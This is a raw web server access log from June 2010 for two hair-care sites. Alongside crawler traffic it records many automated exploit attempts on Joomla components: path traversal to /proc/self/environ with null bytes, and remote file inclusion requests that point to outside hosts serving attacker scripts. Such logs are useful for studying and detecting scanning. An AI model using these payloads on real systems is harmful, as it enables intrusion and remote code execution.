208.115.111.245 - - [27/Jun/2010:23:31:50 -0700] "GET /logs/access_100329.log HTTP/1.1" 200 2359296 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
67.15.198.39 - - [27/Jun/2010:23:35:07 -0700] "GET /logs/access_100614.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [27/Jun/2010:23:35:07 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.15.198.39 - - [27/Jun/2010:23:35:07 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
91.121.21.189 - - [27/Jun/2010:23:35:11 -0700] "GET /logs/access_100614.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.21.189 - - [27/Jun/2010:23:35:11 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.21.189 - - [27/Jun/2010:23:35:11 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
174.121.216.99 - - [27/Jun/2010:23:35:37 -0700] "GET /logs/access_100614.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [27/Jun/2010:23:35:37 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
174.121.216.99 - - [27/Jun/2010:23:35:37 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:36:44 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:36:44 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:36:44 -0700] "GET /logs/access_100531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:12 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:12 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:12 -0700] "GET /logs/access_100531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:33 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:33 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
93.186.192.124 - - [27/Jun/2010:23:37:33 -0700] "GET /logs/access_100531.log%20%20/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.41.233.128 - - [27/Jun/2010:23:38:32 -0700] "GET /logs/access_100614.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [27/Jun/2010:23:38:32 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
78.41.233.128 - - [27/Jun/2010:23:38:32 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:38:37 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:38:37 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:38:38 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:40:07 -0700] "GET /logs/access_100405.log HTTP/1.1" 200 1900544 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
213.165.85.241 - - [27/Jun/2010:23:42:13 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:42:13 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:42:13 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.63.9.134 - - [27/Jun/2010:23:42:33 -0700] "GET /logs/access_100614.log//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
178.63.9.134 - - [27/Jun/2010:23:42:33 -0700] "GET /index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
178.63.9.134 - - [27/Jun/2010:23:42:33 -0700] "GET /logs//index.php?option=com_php&file=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:42:52 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:42:58 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:42:58 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:43:01 -0700] "GET /logs/access_100329.log/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:43:01 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:43:01 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:43:06 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
81.2.252.33 - - [27/Jun/2010:23:44:15 -0700] "GET /?index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.124.120.23 - - [27/Jun/2010:23:44:29 -0700] "GET /logs/access_100329.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
94.124.120.23 - - [27/Jun/2010:23:44:32 -0700] "GET /logs/access_100329.log%20%20/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.thepursuitofpower.com/seeinside/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
86.109.170.175 - - [27/Jun/2010:23:44:47 -0700] "GET /logs/access_100607.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
86.109.170.175 - - [27/Jun/2010:23:44:47 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.79" "growlonghairfast.com"
86.109.170.175 - - [27/Jun/2010:23:44:47 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.79" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:47:39 -0700] "GET /logs/access_100614.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:47:39 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:47:40 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
213.165.85.241 - - [27/Jun/2010:23:47:47 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:23:48:27 -0700] "GET /logs/access_100412.log HTTP/1.1" 200 2139776 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
81.2.252.33 - - [27/Jun/2010:23:54:16 -0700] "GET /logs/access.log/?index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.2.252.33 - - [27/Jun/2010:23:54:16 -0700] "GET /?index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
81.2.252.33 - - [27/Jun/2010:23:54:16 -0700] "GET /logs/?index2.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4799 "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:23:56:45 -0700] "GET /logs/access_100419.log HTTP/1.1" 200 1835008 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:02:42 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:02:42 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:02:42 -0700] "GET /logs/access_100614.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:02:47 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:02:47 -0700] "GET /logs/access_100614.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:02:47 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.30.129.57 - - [28/Jun/2010:00:03:08 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:03:08 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:03:08 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:03:10 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:03:10 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.30.129.57 - - [28/Jun/2010:00:03:10 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:00:05:08 -0700] "GET /logs/access_100426.log HTTP/1.1" 200 1703936 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
67.218.116.171 - - [28/Jun/2010:00:08:11 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
97.104.15.160 - - [28/Jun/2010:00:08:28 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C)" "www.growlonghairfast.com"
97.104.15.160 - - [28/Jun/2010:00:08:29 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MDDC; .NET4.0C)" "www.growlonghairfast.com"
82.140.196.20 - - [28/Jun/2010:00:12:39 -0700] "GET /logs/access_100426.log HTTP/1.1" 200 720896 "http://yandex.ru/yandsearch?text=lat+910%40yandex.ru&clid=14585&lr=14" "Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.5.24 Version/10.54" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:00:13:16 -0700] "GET /logs/access_100301.log HTTP/1.1" 200 2120251 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
79.170.195.103 - - [28/Jun/2010:00:13:56 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.210.105.165 - - [28/Jun/2010:00:15:17 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.freehairsecrets.com"
94.210.105.165 - - [28/Jun/2010:00:15:17 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/4.0 (compatible; Powermarks/3.5; Windows 95/98/2000/NT)" "www.freehairsecrets.com"
81.19.79.209 - - [28/Jun/2010:00:16:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "www.freehairsecrets.com"
79.170.195.103 - - [28/Jun/2010:00:17:10 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:00:21:43 -0700] "GET /logs/access_100222.log HTTP/1.1" 200 2818048 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [28/Jun/2010:00:24:40 -0700] "GET /logs/access_100308.log HTTP/1.1" 200 2199574 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:00:26:05 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:00:26:19 -0700] "GET /logs/access.log/index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:00:26:19 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:00:26:20 -0700] "GET /logs/index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
174.120.243.226 - - [28/Jun/2010:00:26:23 -0700] "HEAD / HTTP/1.1" 200 0 "http://www.roadstoinnovation.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
79.170.195.103 - - [28/Jun/2010:00:26:56 -0700] "GET /logs/access_100426.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.170.195.103 - - [28/Jun/2010:00:26:56 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.170.195.103 - - [28/Jun/2010:00:26:56 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:00:39:24 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:00:39:24 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
124.115.6.13 - - [28/Jun/2010:00:46:38 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "growlonghairfast.com"
64.27.19.114 - - [28/Jun/2010:00:54:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:00:54:17 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:00:58:29 -0700] "GET /logs/access.log//index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:00:58:30 -0700] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
174.121.216.99 - - [28/Jun/2010:00:58:30 -0700] "GET /logs//index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
65.254.36.102 - - [28/Jun/2010:00:58:35 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
209.188.81.172 - - [28/Jun/2010:00:59:37 -0700] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
208.115.209.170 - - [28/Jun/2010:01:00:02 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=http://camaracamboriu.sc.gov.br/lara.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.209.170 - - [28/Jun/2010:01:00:02 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=http://camaracamboriu.sc.gov.br/lara.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.115.209.170 - - [28/Jun/2010:01:00:02 -0700] "GET /index.php?option=com_rokdownloads&controller=http://camaracamboriu.sc.gov.br/lara.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
208.80.193.29 - - [28/Jun/2010:01:00:25 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 2.0.50727; .NET CLR 1.1.4322; Media Center PC 4.0; yplus 5.1.04b)" "growlonghairfast.com"
62.44.73.150 - - [28/Jun/2010:01:01:04 -0700] "GET /logs/access.log%20%20///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [28/Jun/2010:01:01:04 -0700] "GET /logs///index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.73.150 - - [28/Jun/2010:01:01:04 -0700] "GET //index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.37.176 - - [28/Jun/2010:01:01:47 -0700] "GET /logs/access_091116.log HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:01:02:43 -0700] "GET /logs/access.log/index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:01:02:44 -0700] "GET /index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
178.63.27.83 - - [28/Jun/2010:01:02:44 -0700] "GET /logs/index.php?option=com_noticeboard&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
94.155.49.192 - - [28/Jun/2010:01:04:50 -0700] "GET /index.php?option=com_jejob&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:05:29 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:05:29 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:05:29 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:08:47 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:08:47 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
64.27.19.114 - - [28/Jun/2010:01:08:48 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.205.67.73 - - [28/Jun/2010:01:11:19 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
